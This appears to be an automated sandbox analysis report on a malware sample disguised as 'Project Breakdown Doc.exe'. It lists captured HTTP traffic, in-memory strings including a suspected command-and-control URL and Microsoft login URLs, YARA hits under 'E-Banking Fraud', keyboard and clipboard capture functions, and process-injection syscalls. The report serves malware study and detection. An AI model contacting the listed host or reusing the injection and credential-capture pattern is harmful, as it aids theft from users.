2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 22 Nov 2024 11:42:39 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 22 Nov 2024 11:43:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 22 Nov 2024 11:43:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 22 Nov 2024 11:43:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: VFfhzkOtKq.exe, 00000007.00000002.2938680835.0000000004CFA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wine-drinkers.club
                Source: VFfhzkOtKq.exe, 00000007.00000002.2938680835.0000000004CFA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wine-drinkers.club/hakt/
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powercfg.exe, 00000006.00000002.2937780821.0000000004408000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000006.00000002.2939443430.0000000006790000.00000004.00000800.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.0000000002F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powercfg.exe, 00000006.00000003.2452967426.00000000081F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB425A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CB4458
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB425A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CA0219
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CCCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CCCDAC

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: This is a third-party compiled AutoIt script.0_2_00C43B4C
                Source: Project Breakdown Doc.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Project Breakdown Doc.exe, 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_761de984-0
                Source: Project Breakdown Doc.exe, 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f72e6896-b
                Source: Project Breakdown Doc.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_95724fa1-4
                Source: Project Breakdown Doc.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0395a16b-9
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CD33 NtClose,1_2_0042CD33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B60 NtClose,LdrInitializeThunk,1_2_03B72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03B72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,1_2_03B735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74340 NtSetContextThread,1_2_03B74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74650 NtSuspendThread,1_2_03B74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BA0 NtEnumerateValueKey,1_2_03B72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B80 NtQueryInformationFile,1_2_03B72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BF0 NtAllocateVirtualMemory,1_2_03B72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BE0 NtQueryValueKey,1_2_03B72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AB0 NtWaitForSingleObject,1_2_03B72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AF0 NtWriteFile,1_2_03B72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AD0 NtReadFile,1_2_03B72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FA0 NtQuerySection,1_2_03B72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F90 NtProtectVirtualMemory,1_2_03B72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FE0 NtCreateFile,1_2_03B72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F60 NtCreateProcessEx,1_2_03B72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EA0 NtAdjustPrivilegesToken,1_2_03B72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E80 NtReadVirtualMemory,1_2_03B72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E30 NtWriteVirtualMemory,1_2_03B72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DB0 NtEnumerateKey,1_2_03B72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DD0 NtDelayExecution,1_2_03B72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D00 NtSetInformationFile,1_2_03B72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CA0 NtQueryInformationToken,1_2_03B72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CF0 NtOpenProcess,1_2_03B72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CC0 NtQueryVirtualMemory,1_2_03B72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C00 NtQueryInformationProcess,1_2_03B72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C70 NtFreeVirtualMemory,1_2_03B72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C60 NtCreateKey,1_2_03B72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73090 NtSetValueKey,1_2_03B73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73010 NtOpenDirectoryObject,1_2_03B73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B739B0 NtGetContextThread,1_2_03B739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D10 NtOpenProcessToken,1_2_03B73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00CA40B1
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C98858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C98858
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CA545F
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C4E8000_2_00C4E800
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6DBB50_2_00C6DBB5
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC804A0_2_00CC804A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C4E0600_2_00C4E060
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C541400_2_00C54140
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C624050_2_00C62405
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C765220_2_00C76522
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC06650_2_00CC0665
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C7267E0_2_00C7267E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C568430_2_00C56843
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6283A0_2_00C6283A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C789DF0_2_00C789DF
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC0AE20_2_00CC0AE2
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C76A940_2_00C76A94
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C58A0E0_2_00C58A0E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C9EB070_2_00C9EB07
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA8B130_2_00CA8B13
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6CD610_2_00C6CD61
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C770060_2_00C77006
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C531900_2_00C53190
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C5710E0_2_00C5710E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C412870_2_00C41287
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C633C70_2_00C633C7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6F4190_2_00C6F419
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C616C40_2_00C616C4
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C556800_2_00C55680
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C558C00_2_00C558C0
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C678D30_2_00C678D3
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C61BB80_2_00C61BB8
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C79D050_2_00C79D05
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C4FE400_2_00C4FE40
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C61FD00_2_00C61FD0
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6BFE60_2_00C6BFE6
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_017836000_2_01783600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418D531_2_00418D53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E8EA1_2_0040E8EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E8F31_2_0040E8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E93C1_2_0040E93C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011801_2_00401180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029A01_2_004029A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032F01_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F3631_2_0042F363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041057A1_2_0041057A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004105831_2_00410583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026B01_2_004026B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416F431_2_00416F43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004107A31_2_004107A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E7A31_2_0040E7A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C003E61_2_03C003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F01_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA3521_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC02C01_2_03BC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE02741_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF41A21_2_03BF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C001AA1_2_03C001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF81CC1_2_03BF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA1181_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B301001_2_03B30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC81581_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD20001_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C01_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B407701_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B647501_2_03B64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C6E01_2_03B5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C005911_2_03C00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B405351_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B42840
